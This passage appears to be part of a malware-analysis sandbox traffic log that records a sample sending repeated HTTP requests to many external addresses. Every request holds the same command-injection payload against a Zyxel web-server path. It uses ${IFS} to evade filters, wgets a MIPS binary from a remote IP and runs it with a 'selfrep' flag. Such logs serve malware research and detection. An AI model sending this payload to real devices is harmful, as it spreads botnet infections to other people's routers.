                                                Jan 12, 2024 18:24:24.565742016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1526192.168.2.1339550184.72.70.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565785885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1527192.168.2.134789048.109.148.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565850019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1528192.168.2.133661679.141.168.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565869093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1529192.168.2.1340868150.92.197.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565924883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1530192.168.2.13547321.231.202.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565978050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1531192.168.2.1349612139.121.68.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565999985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1532192.168.2.1346346135.178.14.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566045046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1533192.168.2.135767286.11.131.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566092014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1534192.168.2.135551825.81.17.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566148043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1535192.168.2.1338530196.226.8.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566183090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1536192.168.2.135318817.74.24.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566215992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1537192.168.2.1348668193.235.144.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566281080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1538192.168.2.134304459.221.183.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566328049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1539192.168.2.1337688143.3.40.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566381931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1540192.168.2.1341072142.148.2.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566431999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1541192.168.2.135727494.48.215.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566464901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1542192.168.2.1346354182.100.60.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566518068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1543192.168.2.1346338124.195.181.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566560984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1544192.168.2.135206667.94.206.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566582918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1545192.168.2.1347558208.219.86.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566617012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1546192.168.2.1349264101.245.33.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566660881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1547192.168.2.1349724137.73.85.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566699028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1548192.168.2.133803017.226.190.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566776991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1549192.168.2.134705280.255.240.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566812992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1550192.168.2.135845061.201.127.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566876888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1551192.168.2.1357402210.175.58.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566890001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1552192.168.2.1338570102.66.208.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.566941977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1553192.168.2.135242675.10.142.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567019939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1554192.168.2.135012252.34.208.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567051888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1555192.168.2.134857850.9.196.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567085028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1556192.168.2.1343252213.250.163.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567111015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1557192.168.2.1353902187.189.9.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567162037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1558192.168.2.1333514160.74.238.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567203045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1559192.168.2.134450292.195.189.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567246914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1560192.168.2.1348164169.186.193.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567276001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1561192.168.2.1359516125.129.11.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567323923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1562192.168.2.1354018182.227.21.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567337036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1563192.168.2.1345372128.96.58.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567392111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1564192.168.2.1349246197.24.26.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567444086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1565192.168.2.135404068.254.76.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567493916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1566192.168.2.1360318221.243.227.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567518950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1567192.168.2.135495499.211.92.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567538023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1568192.168.2.1352954168.127.200.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567598104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1569192.168.2.1338484192.8.156.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567647934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1570192.168.2.1359734168.119.189.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567676067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1571192.168.2.13419721.165.68.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567714930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1572192.168.2.1357506108.124.233.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567764997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1573192.168.2.135281869.138.20.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567769051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1574192.168.2.1345588152.162.22.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567828894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1575192.168.2.1356028116.83.159.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567854881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1576192.168.2.1353780164.170.51.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567905903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1577192.168.2.135950665.13.159.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567943096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1578192.168.2.1358784112.101.252.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.567989111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1579192.168.2.1350782107.149.94.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568027973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1580192.168.2.1355698165.242.91.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568065882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1581192.168.2.135013839.199.123.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568084002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1582192.168.2.133495275.117.101.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568123102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1583192.168.2.135770072.209.42.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568166018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1584192.168.2.1352840182.132.66.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568191051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1585192.168.2.1344540125.20.67.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568238020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1586192.168.2.135970071.31.193.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568264961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1587192.168.2.133738893.109.134.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.568305016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1588192.168.2.1353642191.91.153.14443
                                                TimestampBytes transferredDirectionData
